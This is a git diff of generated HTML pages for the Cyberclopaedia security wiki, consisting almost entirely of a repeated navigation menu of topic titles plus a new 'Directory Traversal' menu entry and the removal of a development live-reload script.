      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -204,22 +204,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Shell Escape Sequences.html b/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Shell Escape Sequences.html index 8c769974..f196dc45 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Shell Escape Sequences.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Shell Escape Sequences.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/index.html b/docs/Post Exploitation/Privilege Escalation/Linux/index.html index f78e8aa9..44b34079 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/index.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
